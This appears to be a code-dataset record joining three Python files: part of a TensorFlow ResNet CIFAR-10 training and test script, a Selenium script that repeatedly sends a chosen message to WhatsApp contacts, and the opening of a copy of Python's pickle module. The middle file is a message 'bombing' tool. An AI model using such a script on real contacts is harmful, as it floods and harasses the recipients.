vali_labels=vali_labels, session=sess,
batch_data=train_batch_data, batch_label=train_batch_labels)
vali_summ = tf.Summary()
vali_summ.value.add(tag='full_validation_error',
simple_value=validation_error_value.astype(np.float))
summary_writer.add_summary(vali_summ, step)
summary_writer.flush()
else:
_, validation_error_value, validation_loss_value = sess.run([self.val_op,
self.vali_top1_error,
self.vali_loss],
{self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
val_error_list.append(validation_error_value)
start_time = time.time()
_, _, train_loss_value, train_error_value = sess.run([self.train_op, self.train_ema_op,
self.full_loss, self.train_top1_error],
{self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
duration = time.time() - start_time
if step % FLAGS.report_freq == 0:
summary_str = sess.run(summary_op, {self.image_placeholder: train_batch_data,
self.label_placeholder: train_batch_labels,
self.vali_image_placeholder: validation_batch_data,
self.vali_label_placeholder: validation_batch_labels,
self.lr_placeholder: FLAGS.init_lr})
summary_writer.add_summary(summary_str, step)
num_examples_per_step = FLAGS.train_batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.4f (%.1f examples/sec; %.3f ' 'sec/batch)')
print (format_str % (datetime.now(), step, train_loss_value, examples_per_sec,
sec_per_batch))
print ('Train top1 error = ', train_error_value)
print ('Validation top1 error = %.4f' % validation_error_value)
print ('Validation loss = ', validation_loss_value)
print ('----------------------------')
step_list.append(step)
train_error_list.append(train_error_value)
if step == FLAGS.decay_step0 or step == FLAGS.decay_step1:
FLAGS.init_lr = 0.1 * FLAGS.init_lr
print ('Learning rate decayed to ', FLAGS.init_lr)
# Save checkpoints every 10000 steps
if step % 10000 == 0 or (step + 1) == FLAGS.train_steps:
checkpoint_path = os.path.join(train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
df = pd.DataFrame(data={'step':step_list, 'train_error':train_error_list,
'validation_error': val_error_list})
df.to_csv(train_dir + FLAGS.version + '_error.csv')
def test(self, test_image_array):
'''
This function is used to evaluate the test data. Please finish pre-precessing in advance
:param test_image_array: 4D numpy array with shape [num_test_images, img_height, img_width,
img_depth]
:return: the softmax probability with shape [num_test_images, num_labels]
'''
_input_array= []
_weights = []
num_test_images = len(test_image_array)
num_batches = num_test_images // FLAGS.test_batch_size
remain_images = num_test_images % FLAGS.test_batch_size
print ('%i test batches in total...' %num_batches)
# Create the test image and labels placeholders
self.test_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.test_batch_size,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
# Build the test graph
logits, _input_array, _weights = inference(self.test_image_placeholder, FLAGS.num_residual_blocks, reuse=False)
count=1
for i in _input_array:
print("The act shape for layer %d is" %(count), i.shape)
count+=1
predictions = tf.nn.softmax(logits)
# Initialize a new session and restore a checkpoint
saver = tf.train.Saver(tf.all_variables())
sess = tf.Session()
saver.restore(sess, FLAGS.test_ckpt_path)
print ('Model restored from ', FLAGS.test_ckpt_path)
prediction_array = np.array([]).reshape(-1, NUM_CLASS)
# Test by batches
for step in range(num_batches):
if step % 10 == 0:
print ('%i batches finished!' %step)
offset = step * FLAGS.test_batch_size
test_image_batch = test_image_array[offset:offset+FLAGS.test_batch_size, ...]
batch_prediction_array = sess.run(predictions,
feed_dict={self.test_image_placeholder: test_image_batch})
prediction_array = np.concatenate((prediction_array, batch_prediction_array))
# If test_batch_size is not a divisor of num_test_images
if remain_images != 0:
self.test_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[remain_images,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
# Build the test graph
logits = inference(self.test_image_placeholder, FLAGS.num_residual_blocks, reuse=True)
predictions = tf.nn.softmax(logits)
test_image_batch = test_image_array[-remain_images:, ...]
batch_prediction_array = sess.run(predictions, feed_dict={
self.test_image_placeholder: test_image_batch})
prediction_array = np.concatenate((prediction_array, batch_prediction_array))
#count=0
#for i in _input_array:
# count+=1
# print("The size of the input to layer %d is"%(count),sess.run(tf.shape(i)))
#count=0
#for i in _weights:
# count+=1
# print("The size of the weights of layer %d is"%(count),sess.run(tf.shape(i)))
feed_dict={self.test_image_placeholder: test_image_batch}
H, W = sess.run([_input_array, _weights], feed_dict=feed_dict)
for i in W:
print(i.shape)
my_file = Path("./to_interconnect/ip_activation.csv")
if my_file.is_file():
os.remove("./to_interconnect/ip_activation.csv")
my_file_1 = Path("./to_interconnect/num_tiles_per_layer.csv")
if my_file_1.is_file():
os.remove("./to_interconnect/num_tiles_per_layer.csv")
my_file_2 = Path("./to_interconnect/fps.csv")
if my_file_2.is_file():
os.remove("./to_interconnect/fps.csv")
my_file_3 = Path("./Final_Results/area.csv")
if my_file_3.is_file():
os.remove("./Final_Results/area.csv")
my_file_4 = Path("./Final_Results/Latency.csv")
if my_file_4.is_file():
os.remove("./Final_Results/Latency.csv")
my_file_5 = Path("./Final_Results/Energy.csv")
if my_file_5.is_file():
os.remove("./Final_Results/Energy.csv")
hardware_estimation(H,W,8,8)
return prediction_array
def unpickle(self,file):
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
def load_data_one(self,file):
class_num = 10
image_size = 32
img_channels = 3
batch = self.unpickle(file)
data = batch[b'data']
labels = batch[b'labels']
print("Loading %s : %d." %(file, len(data)))
return data, labels
def load_data(self,files, data_dir, label_count):
global image_size, img_channels
data, labels = self.load_data_one(data_dir + '/' + files[0])
for f in files[1:]:
data_n, labels_n = self.load_data_one(data_dir + '/' + f)
data = np.append(data,data_n,axis=0)
labels = np.append(labels,labels_n,axis=0)
labels = np.array( [ [ float( i == label ) for i in range(label_count) ] for label in labels ] )
data = data.reshape([-1,img_channels, image_size, image_size])
data = data.transpose([0, 2, 3, 1])
return data, labels
def prepare_data(self):
class_num = 10
image_size = 32
img_channels = 3
print("======Loading data======")
#download_data()
data_dir = './cifar10_data/cifar-10-batches-py'
image_dim = image_size * image_size * img_channels
meta = self.unpickle( data_dir + '/batches.meta')
label_names = meta[b'label_names']
label_count = len(label_names)
train_files = [ 'data_batch_%d' % d for d in range(1,6) ]
train_data, train_labels = self.load_data(train_files, data_dir, label_count)
test_data, test_labels = self.load_data([ 'test_batch' ], data_dir, label_count)
print("Train data:",np.shape(train_data), np.shape(train_labels))
print("Test data :",np.shape(test_data), np.shape(test_labels))
print("======Load finished======")
print("======Shuffling data======")
indices = np.random.permutation(len(train_data))
train_data = train_data[indices]
train_labels = train_labels[indices]
print("======Prepare Finished======")
return train_data, train_labels, test_data, test_labels
def data_preprocessing(self, x_train,x_test):
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train[:,:,:,0] = (x_train[:,:,:,0] - np.mean(x_train[:,:,:,0])) / np.std(x_train[:,:,:,0])
x_train[:,:,:,1] = (x_train[:,:,:,1] - np.mean(x_train[:,:,:,1])) / np.std(x_train[:,:,:,1])
x_train[:,:,:,2] = (x_train[:,:,:,2] - np.mean(x_train[:,:,:,2])) / np.std(x_train[:,:,:,2])
x_test[:,:,:,0] = (x_test[:,:,:,0] - np.mean(x_test[:,:,:,0])) / np.std(x_test[:,:,:,0])
x_test[:,:,:,1] = (x_test[:,:,:,1] - np.mean(x_test[:,:,:,1])) / np.std(x_test[:,:,:,1])
x_test[:,:,:,2] = (x_test[:,:,:,2] - np.mean(x_test[:,:,:,2])) / np.std(x_test[:,:,:,2])
return x_train, x_test
def test_NSim(self):
train_x, train_y, test_x, test_y = self.prepare_data()
train_x, test_x = self.data_preprocessing(train_x, test_x)
self.test(test_x)
## Helper functions
def loss(self, logits, labels):
'''
Calculate the cross entropy loss given logits and true labels
:param logits: 2D tensor with shape [batch_size, num_labels]
:param labels: 1D tensor with shape [batch_size]
:return: loss tensor with shape [1]
'''
labels = tf.cast(labels, tf.int64)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=labels, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
return cross_entropy_mean
def top_k_error(self, predictions, labels, k):
'''
Calculate the top-k error
:param predictions: 2D tensor with shape [batch_size, num_labels]
:param labels: 1D tensor with shape [batch_size, 1]
:param k: int
:return: tensor with shape [1]
'''
batch_size = predictions.get_shape().as_list()[0]
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
return (batch_size - num_correct) / float(batch_size)
def generate_vali_batch(self, vali_data, vali_label, vali_batch_size):
'''
If you want to use a random batch of validation data to validate instead of using the
whole validation data, this function helps you generate that batch
:param vali_data: 4D numpy array
:param vali_label: 1D numpy array
:param vali_batch_size: int
:return: 4D numpy array and 1D numpy array
'''
offset = np.random.choice(10000 - vali_batch_size, 1)[0]
vali_data_batch = vali_data[offset:offset+vali_batch_size, ...]
vali_label_batch = vali_label[offset:offset+vali_batch_size]
return vali_data_batch, vali_label_batch
def generate_augment_train_batch(self, train_data, train_labels, train_batch_size):
'''
This function helps generate a batch of train data, and random crop, horizontally flip
and whiten them at the same time
:param train_data: 4D numpy array
:param train_labels: 1D numpy array
:param train_batch_size: int
:return: augmented train batch data and labels. 4D numpy array and 1D numpy array
'''
offset = np.random.choice(EPOCH_SIZE - train_batch_size, 1)[0]
batch_data = train_data[offset:offset+train_batch_size, ...]
batch_data = random_crop_and_flip(batch_data, padding_size=FLAGS.padding_size)
batch_data = whitening_image(batch_data)
batch_label = train_labels[offset:offset+FLAGS.train_batch_size]
return batch_data, batch_label
def train_operation(self, global_step, total_loss, top1_error):
'''
Defines train operations
:param global_step: tensor variable with shape [1]
:param total_loss: tensor with shape [1]
:param top1_error: tensor with shape [1]
:return: two operations. Running train_op will do optimization once. Running train_ema_op
will generate the moving average of train error and train loss for tensorboard
'''
# Add train_loss, current learning rate and train error into the tensorboard summary ops
tf.summary.scalar('learning_rate', self.lr_placeholder)
tf.summary.scalar('train_loss', total_loss)
tf.summary.scalar('train_top1_error', top1_error)
# The ema object help calculate the moving average of train loss and train error
ema = tf.train.ExponentialMovingAverage(FLAGS.train_ema_decay, global_step)
train_ema_op = ema.apply([total_loss, top1_error])
tf.summary.scalar('train_top1_error_avg', ema.average(top1_error))
tf.summary.scalar('train_loss_avg', ema.average(total_loss))
opt = tf.train.MomentumOptimizer(learning_rate=self.lr_placeholder, momentum=0.9)
train_op = opt.minimize(total_loss, global_step=global_step)
return train_op, train_ema_op
def validation_op(self, validation_step, top1_error, loss):
'''
Defines validation operations
:param validation_step: tensor with shape [1]
:param top1_error: tensor with shape [1]
:param loss: tensor with shape [1]
:return: validation operation
'''
# This ema object help calculate the moving average of validation loss and error
# ema with decay = 0.0 won't average things at all. This returns the original error
ema = tf.train.ExponentialMovingAverage(0.0, validation_step)
ema2 = tf.train.ExponentialMovingAverage(0.95, validation_step)
val_op = tf.group(validation_step.assign_add(1), ema.apply([top1_error, loss]),
ema2.apply([top1_error, loss]))
top1_error_val = ema.average(top1_error)
top1_error_avg = ema2.average(top1_error)
loss_val = ema.average(loss)
loss_val_avg = ema2.average(loss)
# Summarize these values on tensorboard
tf.summary.scalar('val_top1_error', top1_error_val)
tf.summary.scalar('val_top1_error_avg', top1_error_avg)
tf.summary.scalar('val_loss', loss_val)
tf.summary.scalar('val_loss_avg', loss_val_avg)
return val_op
def full_validation(self, loss, top1_error, session, vali_data, vali_labels, batch_data,
batch_label):
'''
Runs validation on all the 10000 valdiation images
:param loss: tensor with shape [1]
:param top1_error: tensor with shape [1]
:param session: the current tensorflow session
:param vali_data: 4D numpy array
:param vali_labels: 1D numpy array
:param batch_data: 4D numpy array. training batch to feed dict and fetch the weights
:param batch_label: 1D numpy array. training labels to feed the dict
:return: float, float
'''
num_batches = 10000 // FLAGS.validation_batch_size
order = np.random.choice(10000, num_batches * FLAGS.validation_batch_size)
vali_data_subset = vali_data[order, ...]
vali_labels_subset = vali_labels[order]
loss_list = []
error_list = []
for step in range(num_batches):
offset = step * FLAGS.validation_batch_size
feed_dict = {self.image_placeholder: batch_data, self.label_placeholder: batch_label,
self.vali_image_placeholder: vali_data_subset[offset:offset+FLAGS.validation_batch_size, ...],
self.vali_label_placeholder: vali_labels_subset[offset:offset+FLAGS.validation_batch_size],
self.lr_placeholder: FLAGS.init_lr}
loss_value, top1_error_value = session.run([loss, top1_error], feed_dict=feed_dict)
loss_list.append(loss_value)
error_list.append(top1_error_value)
return np.mean(loss_list), np.mean(error_list)
if __name__ == "__main__":
maybe_download_and_extract()
# Initialize the Train object
train = Train()
# Start the training session
# train.train()
train.test_NSim()
|
py | 7dfaa1f7b82a03c761d072d9abc4f83c16f75161 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import mycontacts
import tkinter as tk
from tkinter import *
import xpath
import time
# Function checking whether the given user exists in the user's whatsapp contact list
def checkuser(str):
try:
driver.find_element_by_xpath(str)
except NoSuchElementException:
return False
return True
# Taking all the Credentials from the user
contact_name = []
print(
"\n\nEnter the name of the contact you want to send message to (Type 'ALL' if you want to send message to all your contacts: )"
)
print(
R"For multiple contacts use newline and type 'stop' at the end to stop adding contacts: "
)
while 1:
a = input()
if a == "stop":
break
contact_name.append(a)
print("Enter the message you want to send:- ", end=" ")
message = input()
print(
"Enter the number of times you want to bomb the message to your contact: ", end=" "
)
count_message = int(input())
# defining the driver for the chrome
driver = webdriver.Chrome()
d1 = driver.get("https://web.whatsapp.com/")
driver.maximize_window()
time.sleep(10)
# If the user chooses ALL then the message will be sent to all the contacts added in mycontacts.py
if "ALL" in contact_name:
for contact in mycontacts.my_contacts:
# locating the chat icon using xpath
chat = driver.find_element_by_xpath(xpath.newchat_xpath)
chat.click()
# locating the search box using xpath and adding the contact to search
search = driver.find_element_by_xpath(xpath.search_xpath)
search.send_keys(contact)
time.sleep(1)
# Checking whether the contact exist or not
if checkuser("//span[@title='{}']".format(contact)) == False:
continue
# Searching the contact and clicking on it
find_user = driver.find_element_by_xpath("//span[@title='{}']".format(contact))
find_user.click()
time.sleep(1)
# Finding the box to type the message and clicking on it
find_message = driver.find_element_by_xpath(xpath.message_xpath)
find_message.click()
time.sleep(1)
# Sending the messages on the basis of count given by the user
for i in range(count_message):
find_message.send_keys(message)
driver.find_element_by_xpath(xpath.sendbutton_xpath).click()
time.sleep(0.5)
time.sleep(1)
# Else the messages will be sent to the users mentioned in the input
else:
for contact in contact_name:
chat = driver.find_element_by_xpath(xpath.newchat_xpath)
chat.click()
search = driver.find_element_by_xpath(xpath.search_xpath)
search.send_keys(contact)
time.sleep(1)
if checkuser("//span[@title='{}']".format(contact)) == False:
continue
find_user = driver.find_element_by_xpath("//span[@title='{}']".format(contact))
find_user.click()
time.sleep(1)
find_message = driver.find_element_by_xpath(xpath.message_xpath)
find_message.click()
time.sleep(1)
for i in range(count_message):
find_message.send_keys(message)
driver.find_element_by_xpath(xpath.sendbutton_xpath).click()
time.sleep(0.5)
time.sleep(1)
print("Sms Bombing Completed...!!!!")
|
py | 7dfaa24f9ffbd55b9ee43d1eff81c92f7804c26c | """Create portable serialized representations of Python objects.
See module copyreg for a mechanism for registering custom picklers.
See module pickletools source for extensive comments.
Classes:
Pickler
Unpickler
Functions:
dump(object, file)
dumps(object) -> string
load(file) -> object
loads(string) -> object
Misc variables:
__version__
format_version
compatible_formats
"""
#
# Copyright 2019 The Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from types import FunctionType
from copyreg import dispatch_table
from copyreg import _extension_registry, _inverted_registry, _extension_cache
from itertools import islice
from functools import partial
import sys
from sys import maxsize
from struct import pack, unpack
import re
import io
import codecs
import _compat_pickle
__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",
"Unpickler", "dump", "dumps", "load", "loads"]
# Shortcut for use in isinstance testing
bytes_types = (bytes, bytearray)
# These are purely informational; no code uses these.
format_version = "4.0" # File format version we write
compatible_formats = ["1.0", # Original protocol 0
"1.1", # Protocol 0 with INST added
"1.2", # Original protocol 1
"1.3", # Protocol 1 with BINFLOAT added
"2.0", # Protocol 2
"3.0", # Protocol 3
"4.0", # Protocol 4
] # Old format versions we can read
# This is the highest protocol number we know how to read.
HIGHEST_PROTOCOL = 4
# The protocol we write by default. May be less than HIGHEST_PROTOCOL.
# We intentionally write a protocol that Python 2.x cannot read;
# there are too many issues with that.
DEFAULT_PROTOCOL = 3
class PickleError(Exception):
"""A utils base class for the other pickling exceptions."""
pass
class PicklingError(PickleError):
"""This exception is raised when an unpicklable object is passed to the
dump() method.
"""
pass
class UnpicklingError(PickleError):
"""This exception is raised when there is a problem unpickling an object,
such as a security violation.
Note that other exceptions may also be raised during unpickling, including
(but not necessarily limited to) AttributeError, EOFError, ImportError,
and IndexError.
"""
pass
# An instance of _Stop is raised by Unpickler.load_stop() in response to
# the STOP opcode, passing the object that is the result of unpickling.
class _Stop(Exception):
def __init__(self, value):
self.value = value
# Jython has PyStringMap; it's a dict subclass with string keys
try:
from org.python.core import PyStringMap
except ImportError:
PyStringMap = None
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING = b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
__all__.extend([x for x in dir() if re.match("[A-Z][A-Z0-9_]+$", x)])
class _Framer:
_FRAME_SIZE_MIN = 4
_FRAME_SIZE_TARGET = 64 * 1024
def __init__(self, file_write):
self.file_write = file_write
self.current_frame = None
def start_framing(self):
self.current_frame = io.BytesIO()
def end_framing(self):
if self.current_frame and self.current_frame.tell() > 0:
self.commit_frame(force=True)
self.current_frame = None
def commit_frame(self, force=False):
if self.current_frame:
f = self.current_frame
if f.tell() >= self._FRAME_SIZE_TARGET or force:
data = f.getbuffer()
write = self.file_write
if len(data) >= self._FRAME_SIZE_MIN:
# Issue a single call to the write method of the underlying
# file object for the frame opcode with the size of the
# frame. The concatenation is expected to be less expensive
# than issuing an additional call to write.
write(FRAME + pack("<Q", len(data)))
# Issue a separate call to write to append the frame
# contents without concatenation to the above to avoid a
# memory copy.
write(data)
# Start the new frame with a new io.BytesIO instance so that
# the file object can have delayed access to the previous frame
# contents via an unreleased memoryview of the previous
# io.BytesIO instance.
self.current_frame = io.BytesIO()
def write(self, data):
if self.current_frame:
return self.current_frame.write(data)
else:
return self.file_write(data)
def write_large_bytes(self, header, payload):
write = self.file_write
if self.current_frame:
# Terminate the current frame and flush it to the file.
self.commit_frame(force=True)
# Perform direct write of the header and payload of the large binary
# object. Be careful not to concatenate the header and the payload
# prior to calling 'write' as we do not want to allocate a large
# temporary bytes object.
# We intentionally do not insert a protocol 4 frame opcode to make
# it possible to optimize file.read calls in the loader.
write(header)
write(payload)
class _Unframer:
def __init__(self, file_read, file_readline, file_tell=None):
self.file_read = file_read
self.file_readline = file_readline
self.current_frame = None
def read(self, n):
if self.current_frame:
data = self.current_frame.read(n)
if not data and n != 0:
self.current_frame = None
return self.file_read(n)
if len(data) < n:
raise UnpicklingError(
"pickle exhausted before end of frame")
return data
else:
return self.file_read(n)
def readline(self):
if self.current_frame:
data = self.current_frame.readline()
if not data:
self.current_frame = None
return self.file_readline()
if data[-1] != b'\n'[0]:
raise UnpicklingError(
"pickle exhausted before end of frame")
return data
else:
return self.file_readline()
def load_frame(self, frame_size):
if self.current_frame and self.current_frame.read() != b'':
raise UnpicklingError(
"beginning of a new frame before end of current frame")
self.current_frame = io.BytesIO(self.file_read(frame_size))
# Tools used for pickling.
def _getattribute(obj, name):
for subpath in name.split('.'):
if subpath == '<locals>':
raise AttributeError("Can't get local attribute {!r} on {!r}"
.format(name, obj))
try:
parent = obj
obj = getattr(obj, subpath)
except AttributeError:
raise AttributeError("Can't get attribute {!r} on {!r}"
.format(name, obj)) from None
return obj, parent
def whichmodule(obj, name):
"""Find the module an object belong to."""
module_name = getattr(obj, '__module__', None)
if module_name is not None:
return module_name
# Protect the iteration by using a list copy of sys.modules against dynamic
# modules that trigger imports of other modules upon calls to getattr.
for module_name, module in list(sys.modules.items()):
if module_name == '__main__' or module is None:
continue
try:
if _getattribute(module, name)[0] is obj:
return module_name
except AttributeError:
pass
return '__main__'
def encode_long(x):
r"""Encode a long to a two's complement little-endian binary string.
Note that 0 is a special case, returning an empty string, to save a
byte in the LONG1 pickling context.
>>> encode_long(0)
b''
>>> encode_long(255)
b'\xff\x00'
>>> encode_long(32767)
b'\xff\x7f'
>>> encode_long(-256)
b'\x00\xff'
>>> encode_long(-32768)
b'\x00\x80'
>>> encode_long(-128)
b'\x80'
>>> encode_long(127)
b'\x7f'
>>>
"""
if x == 0:
return b''
nbytes = (x.bit_length() >> 3) + 1
result = x.to_bytes(nbytes, byteorder='little', signed=True)
if x < 0 and nbytes > 1:
if result[-1] == 0xff and (result[-2] & 0x80) != 0:
result = result[:-1]
return result
def decode_long(data):
r"""Decode a long from a two's complement little-endian binary string.
>>> decode_long(b'')
0
>>> decode_long(b"\xff\x00")
255
>>> decode_long(b"\xff\x7f")
32767
>>> decode_long(b"\x00\xff")
-256
>>> decode_long(b"\x00\x80")
-32768
>>> decode_long(b"\x80")
-128
>>> decode_long(b"\x7f")
127
"""
return int.from_bytes(data, byteorder='little', signed=True)
# Pickling machinery
class _Pickler:
def __init__(self, file, protocol=None, *, fix_imports=True):
"""This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the
given protocol; supported protocols are 0, 1, 2, 3 and 4. The
default protocol is 3; a backward-incompatible protocol designed
for Python 3.
Specifying a negative protocol version selects the highest
protocol version supported. The higher the protocol used, the
more recent the version of Python needed to read the pickle
produced.
The *file* argument must have a write() method that accepts a
single bytes argument. It can thus be a file object opened for
binary writing, an io.BytesIO instance, or any other custom
object that meets this interface.
If *fix_imports* is True and *protocol* is less than 3, pickle
will try to map the new Python 3 names to the old module names
used in Python 2, so that the pickle data stream is readable
with Python 2.
"""
if protocol is None:
protocol = DEFAULT_PROTOCOL
if protocol < 0:
protocol = HIGHEST_PROTOCOL
elif not 0 <= protocol <= HIGHEST_PROTOCOL:
raise ValueError("pickle protocol must be <= %d" % HIGHEST_PROTOCOL)
try:
self._file_write = file.write
except AttributeError:
raise TypeError("file must have a 'write' attribute")
self.framer = _Framer(self._file_write)
self.write = self.framer.write
self._write_large_bytes = self.framer.write_large_bytes
self.memo = {}
self.proto = int(protocol)
self.bin = protocol >= 1
self.fast = 0
self.fix_imports = fix_imports and protocol < 3
def clear_memo(self):
"""Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects
are pickled by reference and not by value. This method is
useful when re-using picklers.
"""
self.memo.clear()
def dump(self, obj):
"""Write a pickled representation of obj to the open file."""
# Check whether Pickler was initialized correctly. This is
# only needed to mimic the behavior of _pickle.Pickler.dump().
if not hasattr(self, "_file_write"):
raise PicklingError("Pickler.__init__() was not called by "
"%s.__init__()" % (self.__class__.__name__,))
if self.proto >= 2:
self.write(PROTO + pack("<B", self.proto))
if self.proto >= 4:
self.framer.start_framing()
self.save(obj)
self.write(STOP)
self.framer.end_framing()
def memoize(self, obj):
"""Store an object in the memo."""
# The Pickler memo is a dictionary mapping object ids to 2-tuples
# that contain the Unpickler memo key and the object being memoized.
# The memo key is written to the pickle and will become
# the key in the Unpickler's memo. The object is stored in the
# Pickler memo so that transient objects are kept alive during
# pickling.
# The use of the Unpickler memo length as the memo key is just a
# convention. The only requirement is that the memo values be unique.
# But there appears no advantage to any other scheme, and this
# scheme allows the Unpickler memo to be implemented as a plain (but
# growable) array, indexed by memo key.
if self.fast:
return
assert id(obj) not in self.memo
idx = len(self.memo)
self.write(self.put(idx))
self.memo[id(obj)] = idx, obj
# Return a PUT (BINPUT, LONG_BINPUT) opcode string, with argument i.
def put(self, idx):
if self.proto >= 4:
return MEMOIZE
elif self.bin:
if idx < 256:
return BINPUT + pack("<B", idx)
else:
return LONG_BINPUT + pack("<I", idx)
else:
return PUT + repr(idx).encode("ascii") + b'\n'
# Return a GET (BINGET, LONG_BINGET) opcode string, with argument i.
def get(self, i):
if self.bin:
if i < 256:
return BINGET + pack("<B", i)
else:
return LONG_BINGET + pack("<I", i)
return GET + repr(i).encode("ascii") + b'\n'
def save(self, obj, save_persistent_id=True):
self.framer.commit_frame()
# Check for persistent id (defined by a subclass)
pid = self.persistent_id(obj)
if pid is not None and save_persistent_id:
self.save_pers(pid)
return
# Check the memo
x = self.memo.get(id(obj))
if x is not None:
self.write(self.get(x[0]))
return
# Check the type dispatch table
t = type(obj)
f = self.dispatch.get(t)
if f is not None:
f(self, obj) # Call unbound method with explicit self
return
# Check private dispatch table if any, or else copyreg.dispatch_table
reduce = getattr(self, 'dispatch_table', dispatch_table).get(t)
if reduce is not None:
rv = reduce(obj)
else:
# Check for a class with a custom metaclass; treat as regular class
try:
issc = issubclass(t, type)
except TypeError: # t is not a class (old Boost; see SF #502085)
issc = False
if issc:
self.save_global(obj)
return
# Check for a __reduce_ex__ method, fall back to __reduce__
reduce = getattr(obj, "__reduce_ex__", None)
if reduce is not None:
rv = reduce(self.proto)
else:
reduce = getattr(obj, "__reduce__", None)
if reduce is not None:
rv = reduce()
else:
raise PicklingError("Can't pickle %r object: %r" %
(t.__name__, obj))
# Check for string returned by reduce(), meaning "save as global"
if isinstance(rv, str):
self.save_global(obj, rv)
return
# Assert that reduce() returned a tuple
if not isinstance(rv, tuple):
raise PicklingError("%s must return string or tuple" % reduce)
# Assert that it returned an appropriately sized tuple
l = len(rv)
if not (2 <= l <= 5):
raise PicklingError("Tuple returned by %s must have "
"two to five elements" % reduce)
# Save the reduce() output and finally memoize the object
self.save_reduce(obj=obj, *rv)
def persistent_id(self, obj):
# This exists so a subclass can override it
return None
def save_pers(self, pid):
# Save a persistent id reference
if self.bin:
